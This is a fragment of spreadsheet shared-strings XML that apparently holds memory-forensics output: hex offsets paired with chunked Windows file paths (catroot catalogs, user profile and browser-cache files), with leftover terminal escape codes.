    <t>\Users\sshd_server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.i</t>
  </si>
  <si>
    <t>ni_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9db800</t>
  </si>
  <si>
    <t>\Users\sshd_server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibi</t>
  </si>
  <si>
    <t>lity\On-Scree</t>
  </si>
  <si>
    <t>n Keyboard.</t>
  </si>
  <si>
    <t>lnk_x001B_[0</t>
  </si>
  <si>
    <t>K_x001B_[113G</t>
  </si>
  <si>
    <t>0xdf9de140</t>
  </si>
  <si>
    <t>\Windows\System32\ws2help.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9e07f8</t>
  </si>
  <si>
    <t>\Windows\System32\win32spl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9e08b0</t>
  </si>
  <si>
    <t>\Windows\System32\wfp\wfpdiag.etl_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9e0b90</t>
  </si>
  <si>
    <t>\Windows\inf\netnb.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9e1398</t>
  </si>
  <si>
    <t>\Windows\System32\napipsec.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9e1450</t>
  </si>
  <si>
    <t>\Windows\System32\tcpbidi.xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9e1908</t>
  </si>
  <si>
    <t>0xdf9e2118</t>
  </si>
  <si>
    <t>0xdf9e2430</t>
  </si>
  <si>
    <t>0xdf9e2810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Lang</t>
  </si>
  <si>
    <t>uagePack-Pack</t>
  </si>
  <si>
    <t>0xdf9e2950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ClipsInTheL</t>
  </si>
  <si>
    <t>ibrary-Packag</t>
  </si>
  <si>
    <t>0xdf9e2b28</t>
  </si>
  <si>
    <t>0xdf9e2e40</t>
  </si>
  <si>
    <t>age-wrapper</t>
  </si>
  <si>
    <t>0xdf9e2f80</t>
  </si>
  <si>
    <t>0xdf9e31c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-B</t>
  </si>
  <si>
    <t>asic-Encoder-</t>
  </si>
  <si>
    <t>0xdf9e34d8</t>
  </si>
  <si>
    <t>0xdf9e37f0</t>
  </si>
  <si>
    <t>0xdf9e3930</t>
  </si>
  <si>
    <t>asic-Package-</t>
  </si>
  <si>
    <t>wrapper~31b</t>
  </si>
  <si>
    <t>0xdf9e3b08</t>
  </si>
  <si>
    <t>0xdf9e3e40</t>
  </si>
  <si>
    <t>0xdf9e40f8</t>
  </si>
  <si>
    <t>0xdf9e4238</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Mode</t>
  </si>
  <si>
    <t>m-Drivers-Pac</t>
  </si>
  <si>
    <t>0xdf9e4570</t>
  </si>
  <si>
    <t>0xdf9e4748</t>
  </si>
  <si>
    <t>asic-Package~</t>
  </si>
  <si>
    <t>0xdf9e4a60</t>
  </si>
  <si>
    <t>0xdf9e4d78</t>
  </si>
  <si>
    <t>0xdf9e4f80</t>
  </si>
  <si>
    <t>0xdf9e5118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-DesktopWind</t>
  </si>
  <si>
    <t>owManager-uDW</t>
  </si>
  <si>
    <t>M-Package~3</t>
  </si>
  <si>
    <t>0xdf9e5430</t>
  </si>
  <si>
    <t>0xdf9e5748</t>
  </si>
  <si>
    <t>0xdf9e5b28</t>
  </si>
  <si>
    <t>0xdf9e5c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Disk-Diagno</t>
  </si>
  <si>
    <t>sis-Package~3</t>
  </si>
  <si>
    <t>0xdf9e5e40</t>
  </si>
  <si>
    <t>0xdf9e6298</t>
  </si>
  <si>
    <t>0xdf9e6470</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Editions-Cl</t>
  </si>
  <si>
    <t>ient-Package~</t>
  </si>
  <si>
    <t>0xdf9e6788</t>
  </si>
  <si>
    <t>0xdf9e6aa0</t>
  </si>
  <si>
    <t>0xdf9e6be0</t>
  </si>
  <si>
    <t>0xdf9e6db8</t>
  </si>
  <si>
    <t>0xdf9e7028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-EnterpriseE</t>
  </si>
  <si>
    <t>dition-wrappe</t>
  </si>
  <si>
    <t>r~31bf3856a</t>
  </si>
  <si>
    <t>0xdf9e73a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Gadget-Plat</t>
  </si>
  <si>
    <t>form-Package~</t>
  </si>
  <si>
    <t>0xdf9e74e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GPUPipeline</t>
  </si>
  <si>
    <t>0xdf9e7820</t>
  </si>
  <si>
    <t>0xdf9e79f8</t>
  </si>
  <si>
    <t>dition~31bf38</t>
  </si>
  <si>
    <t>0xdf9e7d10</t>
  </si>
  <si>
    <t>0xdf9e8028</t>
  </si>
  <si>
    <t>0xdf9e8190</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy</t>
  </si>
  <si>
    <t>ions-Packag</t>
  </si>
  <si>
    <t>0xdf9e8368</t>
  </si>
  <si>
    <t>0xdf9e8680</t>
  </si>
  <si>
    <t>0xdf9e8998</t>
  </si>
  <si>
    <t>0xdf9e8ba0</t>
  </si>
  <si>
    <t>0xdf9e8d78</t>
  </si>
  <si>
    <t>0xdf9e9300</t>
  </si>
  <si>
    <t>-ClientTools-</t>
  </si>
  <si>
    <t>0xdf9e9508</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreCl</t>
  </si>
  <si>
    <t>ientUAPE-Pack</t>
  </si>
  <si>
    <t>0xdf9e96e0</t>
  </si>
  <si>
    <t>0xdf9e99f8</t>
  </si>
  <si>
    <t>0xdf9e9d10</t>
  </si>
  <si>
    <t>0xdf9e9e50</t>
  </si>
  <si>
    <t>0xdf9ea148</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ICM-Package</t>
  </si>
  <si>
    <t>0xdf9ea320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Custom</t>
  </si>
  <si>
    <t>ization-Packa</t>
  </si>
  <si>
    <t>ge~31bf3856</t>
  </si>
  <si>
    <t>35~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9ea638</t>
  </si>
  <si>
    <t>0xdf9ea778</t>
  </si>
  <si>
    <t>35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9ea950</t>
  </si>
  <si>
    <t>0xdf9eac68</t>
  </si>
  <si>
    <t>0xdf9eaf80</t>
  </si>
  <si>
    <t>0xdf9eb2c0</t>
  </si>
  <si>
    <t>0xdf9eb5d8</t>
  </si>
  <si>
    <t>0xdf9eb8f0</t>
  </si>
  <si>
    <t>0xdf9ebc08</t>
  </si>
  <si>
    <t>35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9ebf80</t>
  </si>
  <si>
    <t>35~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9ec320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IE-Troubles</t>
  </si>
  <si>
    <t>hooters-Packa</t>
  </si>
  <si>
    <t>ge-wrapper~</t>
  </si>
  <si>
    <t>0xdf9ec460</t>
  </si>
  <si>
    <t>0xdf9ec638</t>
  </si>
  <si>
    <t>0xdf9ec950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IE-Spelling</t>
  </si>
  <si>
    <t>ish~31bf385</t>
  </si>
  <si>
    <t>e35~x86~~6.3.9412.0.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9ecc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IE-Hyphenat</t>
  </si>
  <si>
    <t>ion-Parent-Pa</t>
  </si>
  <si>
    <t>ckage-Engli</t>
  </si>
  <si>
    <t>sh~31b</t>
  </si>
  <si>
    <t>f3856ad364e35~~~11.2.9412.0.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9ecda8</t>
  </si>
  <si>
    <t>ge-English~</t>
  </si>
  <si>
    <t>56ad364e35~~~11.2.9412.0.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9ecf80</t>
  </si>
  <si>
    <t>ion-Package-E</t>
  </si>
  <si>
    <t>nglish~31bf</t>
  </si>
  <si>
    <t>364e35~x86~~6.3.9412.0.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9ed278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServ</t>
  </si>
  <si>
    <t>er-AddOn-2-Pa</t>
  </si>
  <si>
    <t>0xdf9ed590</t>
  </si>
  <si>
    <t>0xdf9ed6d0</t>
  </si>
  <si>
    <t>0xdf9ed8a8</t>
  </si>
  <si>
    <t>0xdf9edc68</t>
  </si>
  <si>
    <t>0xdf9edf80</t>
  </si>
  <si>
    <t>0xdf9ee228</t>
  </si>
  <si>
    <t>0xdf9ee430</t>
  </si>
  <si>
    <t>0xdf9ee608</t>
  </si>
  <si>
    <t>er-AddOn-Pack</t>
  </si>
  <si>
    <t>0xdf9ee920</t>
  </si>
  <si>
    <t>0xdf9eec38</t>
  </si>
  <si>
    <t>0xdf9eed78</t>
  </si>
  <si>
    <t>0xdf9eeee8</t>
  </si>
  <si>
    <t>0xdf9ef288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Indexing-Se</t>
  </si>
  <si>
    <t>rvice-Package</t>
  </si>
  <si>
    <t>0xdf9ef5a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ImageBasedS</t>
  </si>
  <si>
    <t>etup-IE-Packa</t>
  </si>
  <si>
    <t>ge-Base-Dow</t>
  </si>
  <si>
    <t>nlevel</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~~6.3.9600.16428.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9ef6e0</t>
  </si>
  <si>
    <t>0xdf9ef8b8</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~en-US~6.3.9600.16428.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9efbd0</t>
  </si>
  <si>
    <t>0xdf9efee8</t>
  </si>
  <si>
    <t>0xdf9f0248</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-InternetExp</t>
  </si>
  <si>
    <t>lorer-Optiona</t>
  </si>
  <si>
    <t>l-Package~3</t>
  </si>
  <si>
    <t>6ad364e35~x86~en-US~11.2.9600.16428.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f0560</t>
  </si>
  <si>
    <t>l-Package-w</t>
  </si>
  <si>
    <t>rapper</t>
  </si>
  <si>
    <t>0xdf9f06a0</t>
  </si>
  <si>
    <t>6ad364e35~x86~en-US~8.0.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f0878</t>
  </si>
  <si>
    <t>0xdf9f0b90</t>
  </si>
  <si>
    <t>0xdf9f0ee8</t>
  </si>
  <si>
    <t>0xdf9f1288</t>
  </si>
  <si>
    <t>lorer-Package</t>
  </si>
  <si>
    <t>-TopLevel~3</t>
  </si>
  <si>
    <t>6ad364e35~x86~~11.2.9600.16428.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f13c8</t>
  </si>
  <si>
    <t>~x86~en-US~8.0.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f15a0</t>
  </si>
  <si>
    <t>-MiniLP~31b</t>
  </si>
  <si>
    <t>d364e35~x86~en-US~11.2.9600.16428.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f18b8</t>
  </si>
  <si>
    <t>6ad364e35~x86~~8.0.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f1bd0</t>
  </si>
  <si>
    <t>0xdf9f1d10</t>
  </si>
  <si>
    <t>6ad364e35~x86~~8.0.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f1ee8</t>
  </si>
  <si>
    <t>6ad364e35~x86~en-US~8.0.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f2248</t>
  </si>
  <si>
    <t>~x86~~8.0.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f2560</t>
  </si>
  <si>
    <t>~x86~~8.0.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f26a0</t>
  </si>
  <si>
    <t>lorer-VistaPl</t>
  </si>
  <si>
    <t>us-Update~3</t>
  </si>
  <si>
    <t>0xdf9f2878</t>
  </si>
  <si>
    <t>~x86~~11.2.9600.16428.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f2c38</t>
  </si>
  <si>
    <t>~x86~en-US~8.0.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f2ee8</t>
  </si>
  <si>
    <t>~x86~en-US~11.2.9600.16428.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f31c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Links-Packa</t>
  </si>
  <si>
    <t>601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f33c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-LocalPack-G</t>
  </si>
  <si>
    <t>B-Package~31b</t>
  </si>
  <si>
    <t>0xdf9f35a0</t>
  </si>
  <si>
    <t>0xdf9f38b8</t>
  </si>
  <si>
    <t>0xdf9f3bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Killbits-Pa</t>
  </si>
  <si>
    <t>86~~8.</t>
  </si>
  <si>
    <t>0.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f3d10</t>
  </si>
  <si>
    <t>600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f3ee8</t>
  </si>
  <si>
    <t>0.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9f41c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Media-Forma</t>
  </si>
  <si>
    <t>t-Package~31b</t>
  </si>
  <si>
    <t>0xdf9f44d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-LocalPack-Z</t>
  </si>
  <si>
    <t>A-Package~31b</t>
  </si>
  <si>
    <t>0xdf9f4618</t>
  </si>
  <si>
    <t>0xdf9f4950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-LocalPack-U</t>
  </si>
  <si>
    <t>S-Package~31b</t>
  </si>
  <si>
    <t>0xdf9f4b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-LocalPack-C</t>
  </si>
  <si>
    <t>0xdf9f4e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-LocalPack-A</t>
  </si>
  <si>
    <t>U-Package~31b</t>
  </si>
  <si>
    <t>0xdf9f51e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaCenter</t>
  </si>
  <si>
    <t>0xdf9f5320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaPlayba</t>
  </si>
  <si>
    <t>ck-OC-Package</t>
  </si>
  <si>
    <t>0xdf9f54f8</t>
  </si>
  <si>
    <t>0xdf9f5638</t>
  </si>
  <si>
    <t>0xdf9f5810</t>
  </si>
  <si>
    <t>0xdf9f5b28</t>
  </si>
  <si>
    <t>0xdf9f5ee8</t>
  </si>
  <si>
    <t>0xdf9f61c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaPlayer</t>
  </si>
  <si>
    <t>ion-Package</t>
  </si>
  <si>
    <t>0xdf9f6300</t>
  </si>
  <si>
    <t>0xdf9f64d8</t>
  </si>
  <si>
    <t>0xdf9f6810</t>
  </si>
  <si>
    <t>0xdf9f6b28</t>
  </si>
  <si>
    <t>0xdf9f6e40</t>
  </si>
  <si>
    <t>0xdf9f71e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Cl</t>
  </si>
  <si>
    <t>ient-Basic-Pa</t>
  </si>
  <si>
    <t>0xdf9f74f8</t>
  </si>
  <si>
    <t>0xdf9f7638</t>
  </si>
  <si>
    <t>0xdf9f7810</t>
  </si>
  <si>
    <t>0xdf9f7bd0</t>
  </si>
  <si>
    <t>0xdf9f7ee8</t>
  </si>
  <si>
    <t>0xdf9f8118</t>
  </si>
  <si>
    <t>ient-Sensors-</t>
  </si>
  <si>
    <t>0xdf9f8320</t>
  </si>
  <si>
    <t>0xdf9f84f8</t>
  </si>
  <si>
    <t>ient-Premium-</t>
  </si>
  <si>
    <t>0xdf9f8810</t>
  </si>
  <si>
    <t>0xdf9f8b28</t>
  </si>
  <si>
    <t>0xdf9f8c68</t>
  </si>
  <si>
    <t>0xdf9f8e40</t>
  </si>
  <si>
    <t>0xdf9f91c0</t>
  </si>
  <si>
    <t>ient-SideShow</t>
  </si>
  <si>
    <t>0xdf9f94d8</t>
  </si>
  <si>
    <t>0xdf9f9618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MSMQ-Client</t>
  </si>
  <si>
    <t>0xdf9f9950</t>
  </si>
  <si>
    <t>0xdf9f9b28</t>
  </si>
  <si>
    <t>0xdf9f9e40</t>
  </si>
  <si>
    <t>0xdf9fa118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NetFx3-OC-P</t>
  </si>
  <si>
    <t>-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9fa430</t>
  </si>
  <si>
    <t>0xdf9fa570</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NetworkDiag</t>
  </si>
  <si>
    <t>nostics-Direc</t>
  </si>
  <si>
    <t>tAccessEntr</t>
  </si>
  <si>
    <t>y-Pack</t>
  </si>
  <si>
    <t>age~31bf3856ad364e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9fa748</t>
  </si>
  <si>
    <t>0xdf9faa60</t>
  </si>
  <si>
    <t>0xdf9fae40</t>
  </si>
  <si>
    <t>0xdf9faf80</t>
  </si>
  <si>
    <t>0xdf9fb190</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NFS-ClientS</t>
  </si>
  <si>
    <t>KU-Package~31</t>
  </si>
  <si>
    <t>0xdf9fb2d0</t>
  </si>
  <si>
    <t>0xdf9fb4a8</t>
  </si>
  <si>
    <t>0xdf9fb7e0</t>
  </si>
  <si>
    <t>age~31bf3856ad364e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9fbaf8</t>
  </si>
  <si>
    <t>0xdf9fbe10</t>
  </si>
  <si>
    <t>0xdf9fc118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-OpticalMedi</t>
  </si>
  <si>
    <t>aDisc-Package</t>
  </si>
  <si>
    <t>0xdf9fc430</t>
  </si>
  <si>
    <t>0xdf9fc748</t>
  </si>
  <si>
    <t>0xdf9fcb28</t>
  </si>
  <si>
    <t>0xdf9fcc68</t>
  </si>
  <si>
    <t>0xdf9fce40</t>
  </si>
  <si>
    <t>0xdf9fd298</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PeerDist-Cl</t>
  </si>
  <si>
    <t>0xdf9fd470</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ParentalCon</t>
  </si>
  <si>
    <t>trols-Package</t>
  </si>
  <si>
    <t>0xdf9fd788</t>
  </si>
  <si>
    <t>0xdf9fdaa0</t>
  </si>
  <si>
    <t>0xdf9fdbe0</t>
  </si>
  <si>
    <t>0xdf9fddb8</t>
  </si>
  <si>
    <t>0xdf9fe028</t>
  </si>
  <si>
    <t>0xdf9fe3a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PeerToPeer-</t>
  </si>
  <si>
    <t>Full-Package~</t>
  </si>
  <si>
    <t>0xdf9fe4e8</t>
  </si>
  <si>
    <t>0xdf9fe820</t>
  </si>
  <si>
    <t>0xdf9fe9f8</t>
  </si>
  <si>
    <t>0xdf9fed10</t>
  </si>
  <si>
    <t>0xdf9ff028</t>
  </si>
  <si>
    <t>0xdf9ff190</t>
  </si>
  <si>
    <t>0xdf9ff368</t>
  </si>
  <si>
    <t>0xdf9ff680</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Personaliza</t>
  </si>
  <si>
    <t>tion-Package~</t>
  </si>
  <si>
    <t>0xdf9ff998</t>
  </si>
  <si>
    <t>0xdf9ffba0</t>
  </si>
  <si>
    <t>-US~6.1.7601.17514.cat_x001B_[0K_x001B_[164G</t>
  </si>
  <si>
    <t>0xdf9ffd78</t>
  </si>
  <si>
    <t>0xdfa01e00</t>
  </si>
  <si>
    <t>0xdfa01f80</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa0e350</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa0fb78</t>
  </si>
  <si>
    <t>0xdfa102a0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Caches\cversions.1.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa11620</t>
  </si>
  <si>
    <t>0xdfa11b80</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1</t>
  </si>
  <si>
    <t>000000006.d</t>
  </si>
  <si>
    <t>0xdfa12038</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa12430</t>
  </si>
  <si>
    <t>0xdfa128e8</t>
  </si>
  <si>
    <t>\Users\Wilfred\Desktop\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa13138</t>
  </si>
  <si>
    <t>0xdfa13f38</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa14478</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\852CH0Q4\5</t>
  </si>
  <si>
    <t>6-y-0RG[1].js</t>
  </si>
  <si>
    <t>0xdfa14a58</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8C</t>
  </si>
  <si>
    <t>FD4157_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa15470</t>
  </si>
  <si>
    <t>0xdfa15528</t>
  </si>
  <si>
    <t>0xdfa15998</t>
  </si>
  <si>
    <t>0xdfa15b70</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa169e0</t>
  </si>
  <si>
    <t>0xdfa16c98</t>
  </si>
  <si>
    <t>0xdfa170a8</t>
  </si>
  <si>
    <t>\Windows\System32\tapiperf.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa18dd8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\index392.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa195e8</t>
  </si>
  <si>
    <t>0xdfa1a4f0</t>
  </si>
  <si>
    <t>\Users\Wilfred\Documents\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa1b1e0</t>
  </si>
  <si>
    <t>0xdfa1b360</t>
  </si>
  <si>
    <t>5825dde9_x001B_[0</t>
  </si>
  <si>
    <t>0xdfa1c170</t>
  </si>
  <si>
    <t>0xdfa1c670</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Temp\wmsetup.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa1c7b8</t>
  </si>
  <si>
    <t>0xdfa1cab8</t>
  </si>
  <si>
    <t>0xdfa1ce90</t>
  </si>
  <si>
    <t>0xdfa1d2e8</t>
  </si>
  <si>
    <t>cessories\Sys</t>
  </si>
  <si>
    <t>tem Tools\D</t>
  </si>
  <si>
    <t>esktop</t>
  </si>
  <si>
    <t>.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa1df80</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\de</t>
  </si>
  <si>
    <t>sktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa1e540</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XCHWY7CN\m</t>
  </si>
  <si>
    <t>qdefault[9].j</t>
  </si>
  <si>
    <t>pg_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa1e640</t>
  </si>
  <si>
    <t>0xdfa1ee08</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa1ef40</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini_x001B_[</t>
  </si>
  <si>
    <t>0xdfa1f0c0</t>
  </si>
  <si>
    <t>0xdfa20e18</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HZZ4R8FA\u</t>
  </si>
  <si>
    <t>nnamedS7QCQ48</t>
  </si>
  <si>
    <t>0.jpg_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa213e8</t>
  </si>
  <si>
    <t>0xdfa21f80</t>
  </si>
  <si>
    <t>\Windows\System32\WsmRes.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa22038</t>
  </si>
  <si>
    <t>0xdfa223c8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Crypto\RSA\MachineKeys\5fced7f34b033db8b8ac234a2fa212e2_365abb72-f240-4</t>
  </si>
  <si>
